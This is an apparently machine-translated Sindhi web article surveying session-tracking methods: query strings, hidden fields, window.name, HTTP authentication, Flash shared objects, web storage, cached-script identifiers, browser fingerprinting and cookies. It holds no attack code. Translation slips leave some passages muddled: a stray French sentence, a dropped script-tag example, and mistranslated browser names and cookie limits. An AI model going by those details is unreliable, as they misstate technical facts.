ٻئي طرف، جڏهن هڪ صارف هڪ ئي صفحي تي ٻه ڀيرا رسائي ڪري ٿو، اتي ڪا به ضمانت نه آهي ته ساڳئي سوال واري اسٽرنگ ٻنهي وقتن کي استعمال ڪيو ويندو. مثال طور، جيڪڏهن ڪو صارف پهريون ڀيرو اندروني سائيٽ جي صفحي تي هڪ صفحي تي اچي ٿو ۽ ٻئي ڀيري هڪ ئي صفحي تي هڪ خارجي صفحي تي اچي ٿو، سائيٽ جي صفحي سان لاڳاپيل سوال اسٽرنگ عام طور تي مختلف آهي، جڏهن ته ڪوڪيز ساڳيا آهن. .

سوالن جي تارن جا ٻيا نقصان سيڪيورٽي سان لاڳاپيل آهن: ڊيٽا کي رکڻ جيڪو سوال جي تارن ۾ هڪ سيشن جي سڃاڻپ ڪري ٿو سيشن فيڪسيشن حملن، سڃاڻپ ڪندڙ ريفرنس حملن، ۽ ٻين استحصال کي فعال يا آسان بڻائي ٿو. HTTP ڪوڪيز جي طور تي سيشن ID کي پاس ڪرڻ وڌيڪ محفوظ آهي.

پوشیدہ فارم فيلڊ

سيشن ٽريڪنگ جو ھڪڙو فارم، ASP.NET پاران استعمال ڪيو ويو آھي، ڳجھي فيلڊن سان ويب فارم استعمال ڪرڻ آھي. هي ٽيڪنڪ بلڪل ساڳي آهي URL سوالن جي تارن کي استعمال ڪرڻ لاءِ معلومات کڻڻ ۽ ساڳيا فائدا ۽ نقصان آهن؛ ۽ جيڪڏهن فارم کي HTTP GET طريقي سان پروسيس ڪيو ويندو آهي، فيلڊ اصل ۾ برائوزر جي URL جو حصو بڻجي ويندا آهن جيڪو فارم جمع ڪرڻ وقت ان کي موڪليندو. پر گھڻا فارم HTTP POST سان پروسيس ڪيا ويندا آھن، جنھن ڪري فارم جي معلومات، لڪايل فيلڊز سميت، اضافي ان پٽ جي طور تي شامل ڪيو ويندو آھي جيڪو نه URL جو حصو آھي ۽ نڪي ڪوڪي.

ٽريڪنگ جي نقطه نظر کان هن طريقي جا ٻه فائدا آهن: پهريون، URL جي بجاءِ HTML سورس ڪوڊ ۽ پوسٽ ان پٽ ۾ رکيل معلومات کي ٽريڪ ڪرڻ سراسري صارف کي هن ٽريڪنگ کان بچڻ جي اجازت ڏيندو؛ ٻيو، سيشن جي معلومات نقل نه ڪئي وئي آهي جڏهن صارف URL کي نقل ڪري ٿو (پيج کي ڊسڪ ۾ محفوظ ڪرڻ يا اي ميل ذريعي موڪليو، مثال طور).

window.name

سڀ عام ويب برائوزر DOM جي window.name ملڪيت کي استعمال ڪندي JavaScript ذريعي ڊيٽا جي وڏي مقدار (2MB کان 32MB) ذخيرو ڪري سگھن ٿا. هي ڊيٽا سيشن ڪوڪيز جي بدران استعمال ڪري سگهجي ٿو ۽ پڻ استعمال ڪيو وڃي ٿو ڊومينز تي. ڪلائنٽ سائڊ سيشن متغيرن جي پيچيده سيٽ کي ذخيرو ڪرڻ لاءِ ٽيڪنڪ JSON شين سان گڏ ٿي سگهي ٿي.

نقصان اهو آهي ته هر الڳ ونڊو يا ٽئب جي شروعات ۾ هڪ خالي window.name هوندي. جڏهن ٽيب ذريعي برائوزنگ (استعمال ڪندڙ طرفان کوليو ويو) ان جو مطلب اهو آهي ته ٽيب انفرادي طور تي کوليا ويندا ونڊو نالو نه هوندو. اضافي طور تي window.name مختلف سائيٽن جي سياحن کي ٽريڪ ڪرڻ لاءِ استعمال ڪري سگهجي ٿو جيڪي رازداري جي تشويش پيدا ڪري سگهن ٿيون.

ڪجھ احترامن ۾ ھي ڪوڪيز کان وڌيڪ محفوظ ٿي سگھي ٿو، سرور جي غير شموليت جي ڪري، اھڙيءَ طرح ان کي sniffer ڪوڪيز جي نيٽ ورڪ حملي لاءِ غير محفوظ بڻائي ٿو. بهرحال، جيڪڏهن ڊيٽا جي حفاظت لاءِ خاص اپاءَ ورتا وڃن، ته اهو وڌيڪ حملن جو خطرو آهي، ڇاڪاڻ ته ڊيٽا ساڳئي ونڊو ۾ کليل ٻين سائيٽن ذريعي دستياب آهي.

HTTP جي تصديق

HTTP پروٽوڪول ۾ بنيادي رسائي جي تصديق واري پروٽوڪول ۽ رسائي جي تصديق واري ڊائجسٽ شامل آهي، جيڪا صرف ويب پيج تائين رسائي جي اجازت ڏئي ٿي جڏهن صارف صارف نالو ۽ پاسورڊ ڏنو آهي. جيڪڏهن سرور ويب پيج تائين رسائي فراهم ڪرڻ لاءِ هڪ سرٽيفڪيٽ جي درخواست ڪري ٿو، برائوزر ان کي صارف کان درخواست ڪري ٿو ۽ هڪ دفعو حاصل ڪري ٿو، برائوزر ان کي ذخيرو ڪري ٿو ۽ ان کي سڀني ايندڙ HTTP درخواستن ۾ موڪلي ٿو. هي معلومات استعمال ڪندڙ کي ٽريڪ ڪرڻ لاء استعمال ڪري سگهجي ٿو.

مقامي حصيداري اعتراض

جيڪڏهن هڪ برائوزر ۾ Adobe Flash Player پلگ ان شامل آهي، مقامي شيئر ڪيل شيون ڪوڪيز جي طور تي ساڳئي مقصد لاء استعمال ڪري سگهجي ٿو. اهي ويب ڊولپرز لاءِ هڪ پرڪشش انتخاب ٿي سگهن ٿا ڇاڪاڻ ته:

  • مقامي شيئر ٿيل اعتراض لاءِ ڊفالٽ سائيز جي حد 100 KB آهي؛
  • حفاظتي چيڪ صارف جي ڪوڪيز چيڪن کان الڳ آهن (تنهنڪري مقامي شيئر ڪيل شيون اجازت ڏئي سگهجن ٿيون جڏهن ڪوڪيز نه هجن).

هي آخري نقطو، جيڪو ڪوڪيز مينيجمينٽ پاليسي کي ايڊوب جي مقامي شيئر ڪيل شين کان ڌار ڪري ٿو سوال اٿاري ٿو هن جي پرائيويسي سيٽنگن جي استعمال ڪندڙ جي انتظام بابت: هن کي خبر هجڻ گهرجي ته هن جي ڪوڪيز جي انتظام جو مقامي شيئر ڪيل شين جي انتظام تي ڪو به اثر نه پوندو، ۽ ان جي برعڪس.

هن سسٽم جي هڪ ٻي تنقيد اها آهي ته اهو صرف ايڊوب فليش پليئر پلگ ان ذريعي استعمال ڪري سگهجي ٿو جيڪو ملڪيت آهي ۽ ويب معيار نه آهي.

ڪلائنٽ پاسي جي تسلسل

ڪجهه ويب برائوزر هڪ اسڪرپٽ جي بنياد تي ثابت قدمي ميڪانيزم جي حمايت ڪن ٿا، جيڪا صفحي کي اجازت ڏئي ٿي معلومات مقامي طور تي ذخيرو ڪرڻ لاء بعد ۾ استعمال لاء. انٽرنيٽ ايڪسپلورر، مثال طور، برائوزر جي تاريخ، بک مارڪ، XML ۾ محفوظ ڪيل فارميٽ ۾، يا سڌي طرح ڊسڪ ۾ محفوظ ڪيل ويب پيج سان مسلسل معلومات کي سپورٽ ڪري ٿو. Microsoft Internet Explorer 5 لاءِ، اتي موجود آھي صارف-ڊيٽا جو طريقو DHTML رويي ذريعي.

W3C HTML 5 ۾ هڪ نئون JavaScript API متعارف ڪرايو ڪلائنٽ سائڊ ڊيٽا اسٽوريج لاءِ جنهن کي ويب اسٽوريج سڏيو ويندو آهي ۽ جنهن جو مقصد ڪوڪيز کي مستقل طور تبديل ڪرڻ آهي. اهو ڪوڪيز سان ملندڙ جلندڙ آهي پر تمام گهڻي بهتري سان ۽ HTTP درخواستن جي هيڊر ۾ معلومات محفوظ ڪرڻ کان سواءِ. API ٻن قسمن جي ويب اسٽوريج جي اجازت ڏئي ٿي: لوڪل اسٽوريج ۽ سيشن اسٽوريج، پرسٽنٽ ڪوڪيز ۽ سيشن ڪوڪيز وانگر (سواءِ ان سيشن ڪوڪيز جي ختم ٿي ويندي آهي جڏهن برائوزر بند هوندو آهي. سيشن اسٽوريج expire جڏھن ٽيب بند آھي) ترتيب سان. ويب اسٽوريج Mozilla Firefox 3.5، Google Chrome 5، Apple Safari 4، Microsoft Internet Explorer 8 ۽ Opera 10.50 پاران سپورٽ ڪئي وئي آهي.

هڪ مختلف ميکانيزم عام طور تي برائوزر ڪيشنگ تي ڀاڙيندو آهي (ريفريش ڪرڻ بجاءِ ياداشت ۾) ويب صفحن ۾ جاوا اسڪرپٽ پروگرام استعمال ڪندي. 

مثال طور، ھڪڙو صفحو ٽيگ تي مشتمل ٿي سگھي ٿو . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

هن نقطي تي، پروگرام ڪيش ياداشت ۾ رهي ٿو ۽ دورو ڪيل صفحي کي ٻيو ڀيرو ٻيهر لوڊ نه ڪيو ويو آهي. نتيجي طور، جيڪڏهن پروگرام ۾ هڪ گلوبل متغير شامل آهي (مثال طور var id = 3243242؛)، هي سڃاڻپ ڪندڙ صحيح رهي ٿو ۽ ٻيو JavaScript ڪوڊ استعمال ڪري سگهجي ٿو هڪ ڀيرو ٻيهر لوڊ ڪيو ويندو آهي، يا هڪ ڀيرو هڪ ڀيرو جيڪو پروگرام ڳنڍيندڙ صفحي کي لوڊ ڪيو ويندو آهي. 

هن طريقي جو وڏو نقصان اهو آهي ته جاوا اسڪرپٽ گلوبل متغير جامد هجڻ گهرجي، مطلب ته اهو ڪوڪي وانگر تبديل يا ختم نٿو ڪري سگهجي.

ويب برائوزر فنگر پرنٽ

برائوزر فنگر پرنٽ ھڪڙي معلومات آھي جيڪا ھڪڙي برائوزر جي ترتيب جي سيٽنگن جي باري ۾ گڏ ڪئي وئي آھي سڃاڻپ جي مقصدن لاء. اهي فنگر پرنٽس استعمال ڪري سگھجن ٿا مڪمل طور تي يا جزوي طور هڪ انٽرنيٽ استعمال ڪندڙ يا هڪ ڊوائيس جي سڃاڻپ ڪرڻ لاءِ جيتوڻيڪ ڪوڪيز کي غير فعال ڪيو وڃي.

بنيادي ويب برائوزر جي ٺاھ جوڙ جي معلومات ڊگھي عرصي کان گڏ ڪئي وئي آھي ويب سائيٽ سامعين جي خدمتن پاران انساني ويب ٽرئفڪ کي درست انداز ۾ ماپڻ ۽ ڪلڪ فراڊ جي مختلف شڪلن کي ڳولڻ جي مقصد لاءِ. ڪلائنٽ-سائيڊ اسڪرپٽنگ ٻولين جي مدد سان، وڌيڪ صحيح معلومات گڏ ڪرڻ آهي هاڻي ممڪن آهي.

هن معلومات کي ٿوري تار ۾ تبديل ڪرڻ سان هڪ ڊوائيس فنگر پرنٽ پيدا ڪري ٿي. 2010 ۾، اليڪٽرانڪ فرنٽيئر فائونڊيشن (اي ايف ايف) هڪ برائوزر جي فنگر پرنٽ جي اينٽراپي کي گهٽ ۾ گهٽ 18,1 بٽ, ۽ اهو اڳي ئي هو ته ڪينواس فنگر پرنٽنگ ۾ اڳڀرائي ڪئي وئي 5,7 بٽ ان اينٽراپي ۾.

مختصر ۾ ڪوڪيز

ڪوڪيز ننڍيون ٽيڪسٽ فائلون هونديون آهن جيڪي ويب برائوزر طرفان ويب سائيٽ جي دوري جي هارڊ ڊرائيو تي محفوظ ڪيون وينديون آهن ۽ جيڪي استعمال ڪيون وينديون آهن (ٻين شين جي وچ ۾) دورو ڪندڙ يا سائيٽ ذريعي انهن جي سفر بابت معلومات رڪارڊ ڪرڻ لاءِ. ويب ماسٽر اهڙيء طرح هڪ دورو ڪندڙ جي عادتن کي سڃاڻي سگهي ٿو ۽ هر دورو ڪندڙ لاء پنهنجي سائيٽ جي پيشڪش کي ذاتي ڪري سگهي ٿو؛ ڪوڪيز ان کان پوءِ اهو ياد رکڻ ممڪن بڻائين ٿيون ته هوم پيج تي ڪيترا آرٽيڪل ڊسپلي ڪرڻ يا ڪنهن به خانگي پارٽي لاءِ لاگ ان سندون برقرار رکڻ لاءِ: جڏهن دورو ڪندڙ سائيٽ تي واپس اچي ٿو، ان لاءِ هاڻي ضروري ناهي ته هو پنهنجو نالو ۽ پاسورڊ ٽائيپ ڪري تسليم ڪيو وڃي، ڇاڪاڻ ته اهي خود بخود ڪوڪيز ۾ پڙهيا ويندا آهن.

هڪ ڪوڪيز هڪ محدود عمر رکي ٿي، جيڪا سائيٽ ڊزائينر طرفان مقرر ڪئي وئي آهي. اهي سائيٽ تي سيشن جي آخر ۾ پڻ ختم ٿي سگهن ٿا، جيڪو برائوزر جي بند ٿيڻ سان لاڳاپيل آهي. ڪوڪيز وڏي پيماني تي استعمال ڪيون وينديون آهن زندگي کي آسان ڪرڻ لاءِ سنڌين لاءِ ۽ انهن کي پيش ڪرڻ لاءِ وڌيڪ لاڳاپيل معلومات. پر خاص ٽيڪنالاجي اهو ممڪن بڻائي ٿو ته ڪيترن ئي سائيٽن تي هڪ دورو ڪندڙ جي پيروي ڪرڻ ۽ اهڙيء طرح هن جي عادتن تي تمام وسيع معلومات گڏ ڪرڻ ۽ ڪراس چيڪ ڪرڻ. هن طريقي سان ڪوڪيز جي استعمال کي شهرت ڏني آهي هڪ نگراني ٽيڪنڪ جي طور تي جيڪا گهمڻ وارن جي رازداري جي ڀڃڪڙي ڪري ٿي، جيڪا بدقسمتي سان ڪيترن ئي ڪيسن ۾ غير ٽيڪنيڪل سببن جي استعمال جي حقيقت سان مطابقت رکي ٿي يا صارف جي اميدن جو احترام نه ڪندي.

انهن جائز خوفن جي جواب ۾، HTML 5 هڪ نئون JavaScript API متعارف ڪرايو آهي ڪلائنٽ سائڊ ڊيٽا اسٽوريج لاءِ جنهن کي ويب اسٽوريج سڏيو ويندو آهي، جيڪو تمام گهڻو محفوظ ۽ وڏي گنجائش سان آهي، جنهن جو مقصد ڪوڪيز کي تبديل ڪرڻ آهي.

ڪوڪيز جو ذخيرو

ڪجھ برائوزرن سان، ڪوڪيز آساني سان قابل تدوين ٿي سگھي ٿي، ھڪڙو سادو ٽيڪسٽ ايڊيٽر جھڙوڪ Notepad ان جي قدرن کي دستي طور تبديل ڪرڻ لاءِ ڪافي آھي.

برائوزر جي لحاظ کان ڪوڪيز مختلف طريقي سان محفوظ ڪيون وينديون آهن:

  • Microsoft انٽرنيٽ ايڪسپلورر هر ڪوڪي کي مختلف فائل ۾ محفوظ ڪري ٿو؛
  • موزيلا فائر فاڪس ان جي سڀني ڪوڪيز کي ھڪڙي فائل ۾ محفوظ ڪري ٿو؛
  • ناٽڪ ان جي سڀني ڪوڪيز کي ھڪڙي فائل ۾ محفوظ ڪري ٿو ۽ انھن کي انڪرپٽ ڪري ٿو (ان کي تبديل ڪرڻ ناممڪن آھي سواءِ سافٽ ويئر جي اختيارن جي)؛
  • ايپل صفاري ان جي سڀني ڪوڪيز کي هڪ واحد .plist ايڪسٽينشن فائل ۾ محفوظ ڪري ٿو. تبديلي ممڪن آهي پر تمام آسان ناهي، جيستائين توهان سافٽ ويئر جي اختيارن ذريعي نه وڃو.

برائوزرن کي سپورٽ ڪرڻ جي ضرورت آهي هڪ منٽ :

  • 300 هڪ ئي وقت ڪوڪيز؛
  • 4 o في ڪوڪي؛
  • 20 ڪوڪيز في ميزبان يا ڊومين.
[ڪل: 0 مطلب: 0]

پاران لکيل نظرثاني ڪندڙ ايڊيٽرن

ماهر ايڊيٽرن جي ٽيم پنهنجي وقت شين جي تحقيق ، عملي ٽيسٽ ، صنعت جي پيشه ورنرن کي انٽرويو ڏيڻ ، گراهڪن جي جائزي جو جائزو وٺڻ ، ۽ اسان جي سڀني نتيجن کي سمجهڻ جي قابل ۽ جامع خلاصن لاءِ وقت گذاريندي.

تبصرو ڪيو

توهان جو اي ميل پتو شايع نه ڪيو ويندو. گهري شعبن لڳل آهن *

توهان ڇا ٿا سوچيو؟

384 جون پوائينٽون:
اپڊيٽ ڪيو هيٺيونٽ